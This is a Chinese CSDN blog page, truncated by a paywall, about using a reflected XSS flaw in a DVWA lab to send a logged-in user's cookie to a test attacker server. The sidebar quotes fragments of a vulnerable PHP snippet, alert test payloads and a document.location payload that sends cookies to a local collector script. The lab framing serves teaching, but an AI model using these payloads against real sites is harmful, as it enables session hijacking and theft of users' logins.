php反射型xss,利用反射型XSS漏洞,模拟获取登录账户的Cookie

最新推荐文章于 2024-06-23 07:00:00 发布
最新推荐文章于 2024-06-23 07:00:00 发布
阅读量719 收藏 4
点赞数
文章标签: php反射型xss
本文详细介绍了如何利用PHP反射型XSS漏洞来获取登录账户的Cookie信息。通过构建恶意脚本,利用DVWA测试环境,将浏览器的Cookie信息通过JavaScript传递到攻击者服务器上存储的文件中,从而实现模拟窃取Cookie的目的。
摘要由CSDN通过智能技术生成

目录结构

一、测试环境

二、测试目标

三、原理描述

四、操作步骤

1.在服务器上搭建并启用hacker测试网站

2.在服务器上测试站点根目录内创建一个存放攻击脚本的文件夹

3.在xss文件夹下创建攻击脚本、cookie存储文件

4.浏览器客户端向服务端提交特殊构造的XSS攻击脚本

5.检查服务端获取到的cookie信息

6.验证服务端获取到的cookie的有效性

一、测试环境:

PhpStudy+DVWA

二、测试目标:

从已知站点的XSS漏洞,获取已登录账户的cookie相关信息,传递到服务端指定文件中存储

三、原理描述:

利用已知A站点(模拟被攻击站点,http://localhost:8001/dvwa/)存在的反射型XSS漏洞,浏览器客户端向服务端提交特殊构造的脚本语句,由于客户端和服务端缺少必要的敏感字符过滤、转义等控制,浏览器端解析html代码时会执行提交时构造的JavaScript语句,并将当前浏览器登录账户的cookie信息获取并赋给url中设定的参数传递。

因JavaScript语句中构造有B站点(模拟实现攻击的测试网站,http://www.hacktest.com:8002)服务端上指定的js脚本,该js脚本被设置为指向服务端上预先准备好的PHP攻击脚本,该PHP脚本则用来接收浏览器端特定参数传递过来的cookie值、以及其他信息(主机IP、链接来源、日期、浏览器类型...),然后将获取的敏感信息存储到B站点服务端指定的文件中,以达到模拟实现窃取cookie的目的。

四、操作步骤

1.在服务器上搭建并启用hacker测试网站<

最低0.47元/天 解锁文章
weixin_39819152
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
-----已搬运-----反射xss获取cookie(本地实现)
Zero_Adam的博客
02-17 2095
目录:1.最简单的反射xss获取cookie注意!!!! 1.最简单的反射xss获取cookie <?php // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'
cookie获取反射xss具体案例演示
weixin_44720762的博客
05-01 2602
这篇博客用于介绍XSS的危害以及增加对XSS的理解。 下面对于cookie的介绍来源于百度,我个人认为对cookie的讲解已经很清楚了,方便同学阅读,在这里复制了一些。 cookie介绍: Cookie 可以翻译为“小甜品,小饼干” ,Cookie 在网络系统中几乎无处不在,当我们浏览以前访问过的网站时,网页中可能会出现 :你好 XXX,这会让我们感觉很亲切,就好像吃了一个小甜品一样。这其实是通过...
4.XSS-反射(get)利用获取cookie
最新发布
愿听风成曲
06-23 346
我这里将对应的IP地址修改为本地pikachu的主站IP地址,这样给用户造成一种正常视觉上的欺骗,容易上当。修改一下配置文件\pikachu\pkxss\xcookie\cookie.php。就能获取到用户的IP,cookie值,refer二,ua等相关信息。输入基于域名的搭建的pkxss,在搜索框里输入链接。可以将referer的链接发送给对应的要攻击的用户。基于IP搭建的pkxss平台(入侵者的IP地址)在皮卡丘里面的xss后台进入cookie收集。我这里基于域名搭建的pkxss平台。
一个危险的XSS案例——轻松拿到登录用户的cookie
dengrong8117的博客
06-06 1324
casperchen from IMWeb Team. 站酷是我很喜欢的设计类站点,上面有我大二美好的回忆,卖个广告,我的个人主页是:http://www.zcool.com.cn/u/346408 很好,其实上面不是重点。这段时间周围出现了好几单安全相关的问题,基本都是XSS漏洞导致的。于是内心一直惦记着,包括上个周末在逛站酷的时候,然后突发奇想:站酷上是否也存在XSS...
dvwa中 利用反射xss获取cookie进行会话的劫持演示
qq_35420342的博客
04-08 7607
首先打开dvwa,设置安全等级为low:输入&lt;script&gt;alert(11)&lt;/script&gt;证明弹窗:编写获取cookie的代码cookie.php,并将其放在一个web服务器上,这里我就放在http://127.0.0.1/dvwa/下面:构造如下URL,并发送给被攻击者:原始URL: http://location/dvwa/vulnerabilities/xss_...
pikachu靶场之反射XSScookie盗取)
weixin_45705209的博客
08-20 1951
反射XSS 尝试payload发现存在字符长度现在,使用F12查看元素,把maxlength属性改为足够长。使用最简单的payload:<script>alert('xss')</script>,出现弹窗,说明存在漏洞利用漏洞获取cookie实例操作 这里我们用的例子是post,get利用容易被受害者察觉,因为get只能在url中插入<script> document.location = 'http://127.0.0.1/pkxss/xcookie/coo
奇安信安全扫描漏洞解决路径遍历和存储xss反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
反射xss攻击代码.rar
05-14
反射跨站脚本攻击(Reflected Cross-Site Scripting,简称反射XSS)是一种常见的网络安全威胁,攻击者利用此类漏洞可以窃取用户的敏感信息,例如Cookie、Session ID等。Java作为一种广泛使用的后端开发语言,也...
网络安全原理与应用:反射XSS攻击演示.pptx
05-16
反射XSS(Cross-site scripting)攻击是一种常见的Web应用程序安全问题,主要利用用户输入的数据未经充分验证或过滤,直接在浏览器中执行,从而对用户的浏览器发起攻击。这种攻击模式的关键在于,恶意脚本不会被...
反射xss攻击流量数据包
07-18
反射xss攻击流量数据包
YXcms-含有存储XSS漏洞的源码包(1).zip
12-31
存储XSS反射XSS和DOMXSS不同,它不是通过URL参数或者DOM动态生成的,而是将恶意代码存储在了服务器上,比如用户评论、论坛帖子等地方。当其他用户访问这些含有恶意代码的页面时,浏览器会执行其中的脚本,...
php反射xss,反射XSS测试及修复
weixin_28744613的博客
04-01 1338
反射XSS一般出现的位置,如GET参数中测试搜索功能F12查看源码,查找出现1111的位置第一个位置在title处尝试闭合掉title标签,然后测试JS代码,成功弹窗查看源码,XSS执行第二处位置在搜索框,此处XSS无法执行,因为位于value属性内,需要将其闭合测试时注意闭合掉多余的双引号”接下来对XSS漏洞进行源码修复第一处XSS在title位置,输入的搜索参数ks直接echo输出,没有进行...
反射xss钓鱼盗取用户cookie
m0_53820621的博客
01-16 4452
演示用靶场:dvwa
漏洞复现篇——利用XSS漏洞获取cookie
爱国小白帽
02-20 3022
实验环境: PHPstudy 火狐浏览器、IE DVWA靶场
XSS漏洞利用---GETXSS漏洞获取用户Cookie信息
Ethan024的博客
03-07 1152
** XSS漏洞利用(本文仅供技术学习与分享) ** GETXSS漏洞获取用户Cookie信息 我们都知道XSS漏洞可以让浏览器弹框,但是不知道有什么实际的危害。下面我用皮卡丘靶场来做实验。 实验准备 皮卡丘平台为存在XSS漏洞平台的站点; 用户正常访问该站点; 攻击者搭建的,以供收集数据的后台(皮卡丘后台预备好了pkxss平台); 实验思路 攻击者在pkxss后台创建一个接收数据的接口; 攻击者在存在XSS漏洞的站点上插入恶意脚本; 正常的用户访问XSS页面,触发脚本;站点随即返回恶意JS的页面给
php代码审计【6】反射xss
司徒荆的博客
06-20 527
反射xss
XSS ———— (二)利用反射XSS窃取用户Cookie信息并利用
weixin_43102772的博客
02-27 1117
思路: 搭建能接收cookie的服务器 构建带有XSS恶意代码的url 发给用户诱导用户点击url 获得用户cookie利用 实验环境: kali————充当攻击者接收cookie的服务器 192.168.0.53 DVWA————充当客户要访问的目标网站 centos7————充当用户客户端 小试牛刀: 一、搭建服务器 1. kali开启Apache服务 systemctl start a...
XSS窃取cookiephp脚本
weixin_33897722的博客
09-14 248
1.支持PHP 网页 2.网站存在xss的脆弱的地方。 vb.php为存放cookie的网页 PHP Code: <head> <meta http-equiv=”Content-Language” content=”it”> <title>Cookies Stealther – Designed and p...
xss漏洞-DVWA跨站攻击盗取用户cookie
CKT_GOD的博客
09-18 3533
程Kaedy.cn-www.kaedy.cn XSS跨站脚本攻击介绍 跨站脚本攻击英文全称为(Cross site Script)缩写为 CSS,但是为了和层叠样式表(Cascading Style Sheet)CSS 区分开来,所以在安全领域跨站脚本攻击叫做 XSS XSS 攻击简介 XSS 攻击通常指黑客通过往 Web 页面中插入恶意 Script 代码,当用户访问网页时恶意代码在用户的 浏览器中被执行,从而劫持用户浏览器窃取用户信息。 1、黑客加在特定 web 页面 index.html 中,加入
反射xss反射cookie是谁的cookie
07-27
反射 XSS 是一种 Web 攻击方式...而反射 XSS 并不直接获取用户的 Cookie,而是利用用户自身浏览器发送请求时携带的 Cookie 来进行攻击。因此,反射 XSS 攻击利用的是用户自己的 Cookie,而不是攻击者的 Cookie
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值